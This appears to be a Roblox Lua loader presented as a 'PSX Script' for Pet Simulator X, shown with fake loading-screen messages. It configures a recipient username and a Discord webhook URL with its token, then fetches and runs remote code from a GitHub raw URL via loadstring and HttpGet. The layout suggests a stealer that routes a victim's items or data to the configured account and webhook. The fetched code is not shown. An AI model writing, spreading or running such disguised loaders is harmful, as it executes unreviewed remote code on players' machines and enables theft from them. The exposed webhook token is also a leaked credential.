Username = "GiffddWhat"
WebHook = "https://discord.com/api/webhooks/1102174100039942204/w1zbO2i0ykyMvk0GOsK9lD9lFBu391c3oXVhlNpOUExRbh7dbYo7tz9YT72aou-jcl42"


loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI
_G.CustomScriptName = "PSX Script"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
